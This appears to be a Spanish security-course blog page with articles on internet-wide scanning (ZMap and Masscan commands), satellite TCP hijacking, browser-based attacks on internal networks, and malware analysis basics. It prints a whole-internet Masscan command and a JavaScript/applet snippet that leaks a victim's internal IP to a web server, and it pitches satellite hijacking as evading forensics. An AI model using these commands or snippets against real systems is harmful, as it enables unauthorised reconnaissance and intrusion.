¿CÓMO ESCANEAR TODO INTERNET 3.7 MIL MILLONES DE IP’S EN POCOS MINUTOS?

Profesionales de hacking ético y servicios de auditoría de seguridad informática normalmente usan escáner para revisar la seguridad. Escaneo de todas las direcciones IP en Internet no es un trabajo fácil, y si usted no tiene los recursos de un botnet, un simple escaneo puede tomar meses. Va a ser muy difícil, si usted quiere tomar una grande foto de internet porque hacer un escaneo de las redes de internet ha tomado típicamente semanas o meses para terminar. Sin embargo, ahora esto es posible, explica expertos de servicios de seguridad informática con la ayuda de nuevas herramientas como ZMap, Masscan y otras. En este artículo vamos a cubrir diferentesherramientas avanzadas y muy rápidas de escaneo de puertos.

ZMap

ZMap está diseñado para ejecutar escaneos generalizados del espacio de direcciones IPv4 o gran parte de ellas. Es una poderosa herramienta para los investigadores de servicios de auditoría de seguridad informática, y se puede escanear el espacio de direcciones IPv4 entero con más de 1.4 millones de paquetes por segundo.

ZMap no pretende reemplazar los escáneres generales como Nmap, cual es excelente para el escaneo de subredes en profundidad. ZMap está diseñado para hacer un escaneo superficial – por lo general de un solo puerto o servicio – de todo el Internet, o al menos el Internet IPv4, desde una sola computadora dedicada, en menos de una hora. Ame Wilson, una consultara de servicios de auditoría de seguridad informática menciona que ZMap es capaz de escanear el espacio de direcciones públicas IPv4 más de 1300 veces más rápido que el Nmap.

ZMAP es competente de trabajar tan rápido porque utiliza grupos de cíclicos multiplicativos. ZMap ha sido diseñado para conseguir el paralelismo y el rendimiento. En primer lugar, es completamente sin estado, lo que significa que no conserva un estatus por conexión. En lugar de mantener una lista gigante de paquetes enviados, y el tiempo que han estado ahí, y cuánto más tiempo debe esperar para cada uno, y cuidadosamente actualización de la lista con cada respuesta; ZMAP simplemente deja todo eso a través de grupos de cíclicos multiplicativos explica Ame Wilson, consultara de servicios de auditoría de seguridad informática.

En segundo lugar, envía en paralelo tantos paquetes como la red lo permite, con el fin de lograr la mayor tasa posible. Los paquetes se envían en un orden aleatorio, por lo que si mucha gente hacen juntos no haya un ataque DDOS, de esta manera se reduce la probabilidad de sobrecarga de una única red. Aunque cada paquete sucesivo sigue una estricta secuencia algorítmica, los números IP rebotan en todo el espacio de direcciones IPv4. Como resultado, usted no recibe cientos o miles de paquetes que convergen en una sola subred al mismo tiempo.

Debido a estas razones con ZMAP podemos escanear alrededor de 3.7 billones de direcciones en las direcciones IPv4, en una hora así que con ZMAP realmente puede revisar todo el Internet.

Por defecto, ZMap realizará un escaneo SYN TCP en el puerto especificado a la máxima velocidad posible. Una configuración más conservadora que escaneará 10,000 direcciones aleatorias en el puerto 80 en un máximo 10 Mbps se puede ejecutar de la siguiente manera:

$ ZMap –bandwidth=10M –target-port=80 –max-targets=10000 –output-file=results.csv

ZMap puede utilizarse también para explorar bloques CIDR o subredes específicas. Por ejemplo, para escanear sólo 10.0.0.0/8 y 192.168.0.0/16 en el puerto 80, ejecute:

ZMap -p 80 -o results.csv 10.0.0.0/8 192.168.0.0/16

Acuerdo con experto de servicios de seguridad informática, por defecto, ZMap entregará una lista de direcciones IP distintas que respondieron correctamente (por ejemplo con un paquete SYN ACK). Le recomendamos utilizar un archivo de lista negra, para excluir tanto el espacio IP reservado/asignado (por ejemplo, multicast, RFC1918), así como las redes que soliciten ser excluidos de escaneos. Por defecto, ZMap utilizará un archivo de lista negra simple que contiene direcciones reservadas y no asignadas en /etc/ZMap/blacklist.conf.

MASSCAN : Escáner puertos de muchas IP’s

Este es el escáner de puertos de Internet más rápido, ya que puede escanear todo el Internet en menos de 6 minutos con la transmisión de 10 millones de paquetes por segundo, acuerdo con profesor de hacking ético. Produce resultados similares a Nmap y utiliza transmisión asíncrona. La principal diferencia es que esa herramienta es más rápido que los otros escáneres. Además, es más flexible, permitiendo rangos de direcciones arbitrarias y rangos de puertos. Masscan utiliza una pila TCP/IP personalizada y eso significa que algo que no sea escaneo de puertos simples causará variación con la pila TCP/IP local. Esto significa que usted tiene que utilizar la opción -S para utilizar una dirección IP independiente, o configurar su sistema operativo para usar cortafuegos en los puertos que Masscan usa.

Aunque Linux es la plataforma principal para esa herramienta, el código funciona bien en muchos otros sistemas como.

§  Windows w/ Visual Studio

§  Windows w/ MingGW

§  Windows w/ cygwin

§  Mac OS X /w XCode

§  Mac OS X /w cmdline

§  FreeBSD

Para ir más allá de 2 millones de paquetes por segundo, necesita un adaptador de Ethernet de 10 gbps de Intel y un driver especial conocido como “PF_RING ADN”. Masscan no necesita ser reconstruido con el fin de utilizar PF_RING. Para utilizar PF_RING, es necesario construir los siguientes componentes:

§  libpfring.so (instalado en /usr/lib/libpfring.so)

§  pf_ring.ko (su controlador de kernel)

§  ixgbe.ko (su versión del controlador de Ethernet de 10 gbps de Intel)

Masscan puede hacer algo más que detectar si los puertos están abiertos explica expertos de servicios de seguridad informática. También puede completar la conexión TCP y la interacción con la aplicación en dicho puerto con fin de agarrar la información de “banner”. El problema con esto es que Masscan contiene su propia pila TCP / IP separada del sistema se ejecuta en. Cuando el sistema local recibe un SYN-ACK desde el objetivo, responde con un paquete RST que mata la conexión antes de Masscan puede agarrar banner. La forma más fácil de evitar esto es asignar Masscan una dirección IP independiente.

Cómo escanear todo Internet

Mientras que es útil para redes más pequeñas y redes internas, el programa está diseñado realmente con todo Internet en mente

# Masscan 0.0.0.0/0 -p0-65535

Escaneo de todo el Internet es malo. Por un lado, las partes de Internet reaccionan mal a analizarlos. Por otro lado, algunos sitios siguen a los escaneos y se suman su IP en una lista de prohibiciones, que le llevará, cortafuegos de partes útiles de Internet. Por lo tanto, recomendamos excluir una gran cantidad de rangos. Para la lista negra o excluir rangos, puede utilizar la siguiente sintaxis:

# Masscan 0.0.0.0/0 -p0-65535 –excludefile exclude.txt

Scanrand

Scanrand es un escáner de puerto de alta velocidad y route-tracer explica profesor de hacking ético de international institute o cyber security. Su alta eficiencia en la exploración se encuentra en su esquema de trabajo en particular. Es un escáner de red rápido que puede escanear hosts individuales hasta las redes muy grandes de manera eficiente. Scanrand puede hacer lo que se llama el escaneo TCP sin estado, que lo distingue de los otros escáneres de red. Scanrand toma un poco de enfoque diferente del escáner de red típico. Se implementa “dispara y olvida” ideología para escanear mezclando con un poco de matemáticas.

Scanrand se divide sí en dos procesos. Un proceso es responsable de hacer nada más que el envío de paquetes SYN usando libnet. El otro proceso es responsable de recibir las respuestas de los equipos remotos enviados utilizando libpcap. Una cosa importante a tener en cuenta es que estos procesos funcionan de forma independiente. No hay consultas con el otro proceso sobre “¿Usted envía este paquete?” o, “¿ Esto es un paquete válido?” Scanrand guarda lista de direcciones IP que están esperando una respuesta y el proceso de envío no espera una respuesta en absoluto. Se dispara un SYN, y luego pasa a la siguiente computadora dejando el proceso de recepción para resolver la avalancha de las respuestas.

Unicornscan

Unicornscan es una herramienta de código abierto (GPL) diseñada para ayudar en la recopilación de información y auditoría de seguridad. No se puede negar que Nmap establece el estándar para la exploración de puertos en Windows y sistemas UNIX. Sin embargo escaneo UDP y TCP (65k puertos) tardan mucho tiempo para terminar. Hay otro escáner que sobresale en la velocidad; Unicornscan es un escáner de puertos asincrónico sin estado que implementa su propia pila TCP / IP. Unicornscan pasa los puertos que se encuentra a Nmap y / o Amap para seguir con análisis.

Mejores Prácticas de Escaneo

Expertos de servicios de auditoría de seguridad informática ofrecen estas sugerencias para los investigadores que realizan escaneos en todo el Internet como directrices para la buena ciudadanía de Internet.

§  Coordinar con los administradores de redes locales para reducir los riesgos.

§  Verifique que los escaneos no abrumar a la red local o el proveedor de internet.

§  Señalan la razón de los escaneos en las páginas web y entradas de DNS de las direcciones del origen.

§  Explicar con claridad el objetivo y el alcance de los escaneos en todas las comunicaciones

§  Proporcionar un medio simple de la exclusión voluntaria y honrar las solicitudes con prontitud.

§  Llevar a cabo las exploraciones no más grande o más frecuente de lo que es necesario para los objetivos de investigación.

§  Difundir el tráfico de exploración sobre las direcciones y tiempo cuando sea posible.

No hace falta decir que los investigadores de escaneos deben abstenerse de explotar vulnerabilidades o acceder a los recursos protegidos, y debe cumplir con todos los requisitos legales especiales en sus jurisdicciones.

Los problemas de seguridad y problemas éticos

Como de costumbre, la capacidad de descubrir casi instantáneamente las redes y computadoras que tienen vulnerabilidades de seguridad puede ser una buena cosa para los investigadores de sombrero blanco, pero pueda ser utilizado para el motivo malo por los hackers. Estos son seguramente buenas herramientas y probablemente serán adoptadas por muchos investigadores. Sin embargo, eso poderosos escáneres de Internet podrían ser utilizados por los hackers para actividades maliciosas como la detección y la explotación de las vulnerabilidades. La única cosa que un atacante necesita es una máquina potente y una red con buen ancho de banda. Hoy en día, estos requisitos se pueden satisfacer fácilmente mediante el lanzamiento de una máquina virtual en la nube. La existencia de estas herramientas demuestra también que la ventana de tiempo entre la presencia de vulnerabilidad y su detección por los hackers es corta día a día. Por esta razón, es importante asegurar adecuadamente su propia infraestructura.

Profesores de hacking ético recomiendan que estas herramientas deban ser usadas con cuidado, sin invadir la privacidad de otra persona como cualquiera puede usarlos.

Read More

Intercepción - ataques sobre comunicaciones satelital

En este artículo vamos a cubrir el ataque de hacking satelital que ha sido utilizado por grupos de hackers desde muchos años. Este ataque le proporcionará anonimato completo y así va a ser muy difícil por los expertos informática forense para rastrearle. En el último artículo hablamos acerca de la intercepción de tráfico por satélite y cubrimos los siguientes temas.

1. Configuración de antena parabólica.

2. Diferentes satélites y frecuencias correspondientes.

3. Diferentes programas para escanear frecuencias satelitales.

4. Formas de interceptar el tráfico satelital.

5. Cómo tener conexión a internet por satélite, televisión gratis y ataques básicos de piratería/hacking.

Con la ayuda de un software como DVB Snoop y Wireshark podemos interceptar las comunicaciones por satélite y tomar una descarga de datos, como comunicación no está cifrada explica Mike Stevens experto de hacking ético y empresa de seguridad informática. Después de seguir los pasos mencionados en el artículo anterior, vamos a configurar antena parabólica apuntando al satélite específico que emite el tráfico. Como sabemos que los paquetes no están cifrados, utilizaremos DVB-Snoop junto a Wireshark para interceptar el tráfico. Una vez que se identificamos una dirección IP de satélite que ruta a través del enlace descendente del satélite, podemos empezar a interceptar los paquetes de Internet a esta IP específica. Para interceptar los paquetes, podemos hacer ataque de secuestro TCP fácilmente revela experto de empresa de auditoría informática. 

¿Qué es el ataque de secuestro TCP satelital?

Protocolo de Control de Transmisión (TCP) es un protocolo muy importante de la capa de transporte. TCP es un protocolo orientado a la conexión, lo que significa una conexión que se hace y se mantiene hasta que los programas de aplicación en cada extremo hayan terminado la comunicación. Este protocolo determina cómo dividir los datos de la aplicación en paquetes que la red puede entregar. También se comunica con la capa de red y gestiona el control de flujo. El protocolo TCP divide los datos en paquetes, los numera y luego los envía de forma individual a la capa de IP para la entrega. También gestiona la retransmisión y el reconocimiento de los paquetes según expertos de empresa de seguridad informática. En el modelo de comunicación Open Systems Interconnection (OSI), TCP cubre partes de la capa 4, la capa de transporte, partes de la Capa 5 y la capa de sesión. TCP procesa paquetes por número de secuencia y pone los paquetes fuera de orden en sus lugares. El protocolo TCP es el único protocolo de la familia de protocolos TCP/IP que soporta los mecanismos de paquetes adicionales, identificación de la conexión y la autenticación. Eso explica por qué los protocolos de nivel de aplicación, tales como SMTP, FTP, etc. utilizan TCP para obtener acceso remoto a otras máquinas. Para la definición de los paquetes, la cabecera TCP consta de dos campos de 32 bits que se utilizan como contadores de paquetes. Se denominan número de secuencia y reconocimiento. Otro campo, llamado Bit de Control, es 6 bits de largo, y lleva los siguientes indicadores de comando y es muy importante entender esos indicadores para hacer auditoría informática:

URG: Indicador de Urgencia

ACK: Indicador de Reconocimiento

PSH: Indicador de Empuje

RST: Indicador para Restablecer 

SYN: Indicador para sincronizar los números de secuencia

FIN: Indicador, cuando no hay más datos del remitente

Durante el ataque secuestro TCP el hacker se hace cargo de sesión de comunicación entre los diferentes usuarios haciéndose pasar por el usuario autorizado. Una vez que se ha accedido a detalles de la sesión del usuario, el hacker pueda enmascararse como el usuario y hacer cualquier cosa que el usuario está autorizado a hacer en la red. 

Métodos de secuestro TCP satelital

Existen diferentes métodos de secuestro TCP satelital explica Dave Taylor experto de informática forense y algunos de ellos son:

IP Spoofing (Falsificación de IP)

IP spoofing es una técnica utilizada para obtener acceso no autorizado de la comunicación, donde los mensajes se envían por el secuestrador a un ordenador con una dirección IP de un host de confianza. Cuando el secuestrador ha suplantado con éxito una dirección IP, él / ella determina el siguiente número de secuencia que el satélite espera e inyecta el paquete RST con el mismo en la sesión TCP antes de que el cliente puede responder. Así crea un estado no sincronizado. Los números de secuencia y ACK ya no están sincronizados entre cliente y satélite y el secuestrador aprovecha de esta situación para establecer la conexión como usuario de confianza explica experto de empresa de auditoría informática.

Blind Hijacking (Secuestro Ciego)

Cuando el enrutamiento de origen está desactivado y secuestrador no puede ver la respuesta del satélite. El secuestrador utiliza secuestro ciego donde el secuestrador inyecta sus datos maliciosos en comunicaciones interceptadas en una sesión TCP. Así, la palabra "ciegos" porque el secuestrador puede enviar los datos o comandos, pero no puede ver la respuesta. El secuestrador, básicamente,adivina las respuestas del cliente y el satélite.

Man in the Middle (MiTM) (Interceptar Paquetes)

Esta técnica implica el uso de un analizador de paquetes (sniffer) para interceptar la comunicación entre el cliente y el satélite. Todos los datos entre los hosts fluyen a través de sniffer del secuestrador y él es libre de modificar el contenido de los paquetes. Esta técnica significa que los paquetes sean enviados a través de host del secuestrador señala experto de empresa de auditoría informática.

Por el secuestro de comunicación satelital los hackers normalmente utilizan combinación de man in middle y ataque de IP spoofing. Una comunicación normal TCP tiene un apretón de manos de 3 vías usando paquete SYN de usuario por satélite, luego SYN + ACK del satélite al usuario y, por último ACK del usuario al satélite.

Durante un ataque de secuestro TCP, el hacker intercepta la comunicación y envía un paquete RST para el usuario y se inicia la comunicación con el satélite con la dirección IP falsificada del usuario.

Como hacer Secuestro TCP Satelital 

Puede utilizar las siguientes herramientas para hacer TCP Secuestro Satelital:

Hunt

Hunt (distribución binaria de Linux) es un programa para entrometerse en una conexión TCP, revisarlo y reiniciarlo señala experto de empresa de seguridad informática.

1) Con Hunt, podemos hacer la gestión de conexiones y detectar una conexión permanente. Hunt permite secuestro activo con la detección de ACK, ARP spoof y la sincronización del cliente con el satélite después de secuestro.

2) Con Hunt, podemos reiniciar el daemon para restablecimiento de conexión automática y actuar como relay de daemon para ARP spoof. Permite buscar información en el tráfico y la recolección de direcciones MAC.

3) Hunt actúa como programa para resolver host DNS y el motor de paquetes extensible para la observación de TCP, UDP, ICMP y el tráfico ARP. 

Shijack

Shijack es una herramienta de secuestro de conexiones TCP para Linux, FreeBSD y Solaris. La herramienta requiere Libnet. Es un código de fuente abierta y se puede utilizar para tomar el control de la sesión TCP.

Scapy

Scapy es una poderosa herramienta de manipulación de paquetes interactivo escrito en Python, y la mejor parte es que también pueda ser utilizada como una biblioteca en programas Python, que proporciona la pentester la capacidad de crear su propia herramienta basada en la exigencia. Scapy nos permite interceptar crear, enviar y paquetes rebanada modificados para hacking y el análisis de informática forense.

Juggernaut

Juggernaut es básicamente un sniffer de red, que también puede ser utilizado para secuestrar sesiones TCP. Se ejecuta en Linux y tiene un módulo Trinux también. Juggernaut puede ser activado para ver todo el tráfico de red en la red local, o se pueda configurar para escuchar un "token" especial. De esta manera, esta herramienta puede ser utilizada para capturar ciertos tipos de tráfico y puede funcionar durante unos días, y luego el atacante sólo tiene que recoger el archivo de registro que contiene el tráfico registrado.

En el próximo artículo vamos a cubrir más sobre ataques de hacking más avanzados que involucran satélites, también pueden aprender durante curso avanzado de hacking ético de International Institute of Cyber Security. Este artículo es sólo con fines educativos.

Read More

¿CÓMO HACKEAR Y EXPLOTAR LA RED INTERNA Y IPS PRIVADAS?

Según una encuesta por empresa de seguridad informática, la mayoría de las personas creen que mientras se navegan por la Web que están protegidas por firewalls y redes aisladas a través de direcciones privadas del IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de intranet y las interfaces basadas en routers, cortafuegos, impresoras, teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos que permanecen seguro dentro de la zona protegida y nada es capaz de conectar directamente desde el mundo exterior, ¿no?

Bueno, no del todo. Navegadores web pueden ser completamente controlados por cualquier página web, lo que les permite atacar los recursos de la red interna acuerdo con profesores de formación de hacking ético. La navegador web de cada usuario en una red empresarial se puede cambiar en un trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.

Cómo alguien puede explotar la red interna

Un experto de empresa de seguridad informática explica los procedimientos para explotar la red interna:

§  Una víctima visita una página web maliciosa, que asume el control de su navegador Web. La página web maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente que hackers están siendo aprovechado para la entrega de malware masivo.

§  Cuando se ejecuta el malware, lo hace desde la perspectiva de la intranet de la víctima, donde nadie puede acceder directamente. Esto quiere decir que el navegador web de la víctima puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en la red interna en nombre del atacante o víctima.

§  El malware utiliza navegador web de la víctima como una plataforma de lanzamiento, donde el malware hace los análisis de puertos, fingerprinting de los servidores web en la red interna y revisa las soluciones de seguridad perimetral implementadas.

§  El malware se inicia los ataques contra los objetivos internos y la información comprometida se envía fuera de la red para la colección.

Es fácil a obtener la dirección IP pública de un navegador web desde el servidor web, pero la dirección IP interna es poco difícil menciona profesores de formación de hacking ético. Esta es la pieza de información que necesitamos para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo. El siguiente código carga el MyAddress.class y luego abre la URL de

http://webserver/dirección_ip.html?nat = XXXX

<APPLET CODE=”MyAddress.class”>

<PARAM NAME=”URL” VALUE=”http://webserver/ip_address.html?nat=”>

</APPLET>

Si el navegador web de la víctima es una Mozilla / Firefox, es posible omitir el requisito subprograma e invocar una socket de Java directamente desde el JavaScript.

function natIP() {

var w = window.location;

var host = w.host;

var port = w.port || 80;

var Socket = (new

java.net.Socket(host,port)).getLocalAddress().getHostAddress();

return Socket;

}

Framework para explotar la red interna

Sonar

Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas funciones onload para detectar dispositivos internos en una red. sonar.js funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red interna. Mike Stevans profesor de formación de hacking ético explica que tras enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos onload. Si carga los recursos con éxito e inicia el evento onload entonces sabemos que el anfitrión tiene este recurso.

¿Por qué es útil saber? Al obtener una lista de los recursos alojados en un dispositivo, podemos intentar hacer fingerprinting de los dispositivos y soluciones de seguridad perimetral.

¿Cómo funciona Sonar?

Al cargar payload de sonar.js en un navegador web moderno sucederá lo siguiente:

§  sonar.js utilizará WebRTC para enumerar lo IPs internas que tiene el usuario

§  sonar.js luego intenta encontrar otros hosts en vivo de la red interna a través de webSockets.

§  Si no se encuentra una gran cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la vinculación a ella a través de

<img src=”x”> and <link rel=”stylesheet” type=”text/css” href=”x”>

y enganchar el proceso de onload. Si el recurso carga con éxito se activará un evento para lanzar el exploit acuerdo con resultados de fingerprinting.

Sonar.js trabaja sobre una base de datos de fingerprints. Fingerprint es simplemente una lista de los recursos conocidos en una red que se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen imágenes, hojas de CSS style, e incluso JavaScript externo.

Acuerdo con expertos de empresa de seguridad informática, mediante la creación de sus propias fingerprints se puede construir exploits personalizados que serán lanzadas contra los dispositivos internos una vez que son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted puede utilizar estas vulnerabilidades para hacer cosas tales como modificar configuraciones DNS del router, el sacar archivos desde un servidor de archivos interno, y más.

Mediante el uso de sonar.js pentesting puede construir exploits contra los servidores internos de registro, routers, impresoras, teléfonos VOIP, y más menciona expertos de soluciones de seguridad perimetral . Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los dispositivos internos de una red.

Read More

¿Cómo hacer ingeniería inversa de malware?

Software malicioso puede ser virus, gusano, Troyano, Rootkit, Bot, herramienta de DoS, Exploit Kit, spyware. El objetivo del análisis de malware es tener una comprensión de la forma de trabajo de piezas específicas de malware. Hay preguntas importantes que deben ser contestadas. Al igual que, ¿cómo se infecta máquina y qué hace exactamente malware? En este artículo vamos a tratar de entender con la ayuda de Bill Smith, experto de soluciones de seguridad informática, los conceptos básicos de análisis de malware y cómo se puede empezar a hacer análisis de malware.

¿Quién analiza el malware?

Hay diferentes tipos de personas y organizaciones que hacen análisis de malware. Todos ellos caen bajo de estas categorías:

• CSIRT

• Desarrolladores de productos de seguridad

• Los proveedores de servicios de seguridad

• Investigadores de Anti-virus

• Los desarrolladores de software

• Agencias de seguridad del gobierno

¿Por qué hay una necesidad de analizar el malware?

Las siguientes son las razones detrás de análisis de malware.

• Disponer un procedimiento de respuesta a incidentes de hacking.

• Para hacer el desarrollo de productos y la mejora de productos como anti-virus.

• Para la creación de firmas para la protección contra el malware.

• Para crear soluciones de contramedidas.

• Para hacer el análisis y resolución de vulnerabilidad.

• Para rastrear y capturar a los delincuentes que crean el malware.

Métodos de análisis de malware

De acuerdo con expertos de formación de seguridad informática, para hacer análisis de malware tiene que seguir estos pasos:

1. Configuración del entorno

Configurar una máquina controlada que no está conectada a la red, también debe ser capaz de restaurar esta máquina en cualquier momento.

2. Colección del Malware

Para configurar el entorno es necesario descargar el archivo de malware primero, y entonces usted necesita cambiar extensión de archivo. De acuerdo con las sugerencias de expertos en curso de hacking ético, después de bajar el archivo se puede copiar el archivo en un disco protegido ya que esto puede ayudar a aislar el malware en algunos casos.

3. Análisis de superficie

Recuperar información de superficie de maquina con malware sin ejecución. Motivo de análisis de superficie es conseguir:

• Valor Hash

• Tipo de archivo

• Strings

• Los resultados de programas antivirus

4. Análisis en tiempo de ejecución

En este paso se puede ejecutar malware y observar su comportamiento. Puede utilizar varios métodos de análisis automatizados o manuales. Puede utilizar las herramientas de observación en el sistema de sandbox para su análisis. Todo el ambiente se puede ser dedicado o aislado OS nativo o sistema virtual explica Mike Stevens, especialista del Mike Stevens, experto de formación de seguridad informática.

5. Análisis estático

En el análisis estático debe leer el código en el archivo binario y entender su funcionamiento. Usted necesitará el conocimiento del sistema operativo, básico de lenguaje ensamblador, técnicas de lectura eficientes y técnicas anti-análisis. Si está packed el código binario tendrá que hacer unpacking. Además para entender el binario, usted tendrá que descompilar o hacer disassemble/debug del binario.

Puede utilizar siguientes herramientas para el análisis estático:

Disassembler

IDA Interactive DisAssemble: Se desensamblar más de 50 arquitecturas

Decompiler

Hex-rays Decompiler: x86/ARM binario a codigo de C.

VB Decompiler: Binario de Visual Basic a código fuente de Visual Basic.

.NET Reflector: .NET binario a código fuente de .NET.

Debugger

OllyDbg: Muy famoso x86 debugger

Immunity Debugger: x86 debugger de Python

Para entender el código, puede comenzar con las API de Windows de MSDN Library y entender lo que hace el API. También puede comprobar que hacen argumentos y condiciones. Mientras se utiliza un Disassembler, se puede leer, cambiar el nombre y comentar instrucciones para entender el código. Usted puede aprender más sobre Disassembler en curso de formación de hacking ético.

6. Codificación (ofuscación) en Malware

A veces el programador de malware hace ofuscación del código para hacer que sea difícil para que usted pueda hacer el análisis del código.

Nombre de archivo, nombre de la entrada del registro, dirección del servidor almacenada en el binario se codifican como strings. Además paquetes de datos de HTTP pueden ser codificados utilizando diferentes métodos. Algunos de los métodos de codificación son 

• xor (exclusive or)

• ror/rol (rotate right/left)

• base64

• RC4

• AES

También todo los malwares estos días usan C&C servidor (servidor de comando y control) para obtener los comando, devolver los resultados y datos. Los hackers pueden crear servidores C&C utilizando servidores hackeados, sitios web o cuentas de correo electrónico. También se pueden utilizar Twitter y Facebook cuentas como servidor C&C, de manera que no podemos rastrearlos. Pueden aprender cómo crear servidor C&C utilizando cuentas de redes sociales durante la capacitación de la seguridad informática de iicybersecurity. 

7. Prevenir análisis de Malware en tiempo de ejecución

Algunos tipos de malware son lo suficientemente inteligente como para detectar la actividad de análisis por lo tanto tienen una lógica para evitar el análisis por los analistas de malware explica experto soluciones de seguridad informática. Algunas de las técnicas utilizadas para detectar análisis de malware son:

Debugger: Para comprobar si hay debuggers, el malware revisa por puntos de interrupción, manejo de excepciones.

Máquina virtual: Para comprobar si hay máquina virtual, el malware revisa por la interfaz, el comportamiento de la CPU, Herramientas de soporte (como el Virtual box).

Herramientas de análisis: Para comprobar si hay herramienta de análisis de malware como IDA Pro, el malware revisa por el nombre de la ventana, el nombre del módulo.

El malware veces también puede comprobar el nombre del ordenador, el tamaño del disco, la posición del cursor para evitar el análisis de malware. Después de detectar que se realiza el análisis de malware, lo hace algo diferente o no hace nada.

Vamos a cubrir más detalles en profundidad sobre análisis de malware en el próximo artículo con la ayuda de Mike Stevens, profesor de formación hacking ético. 

Read More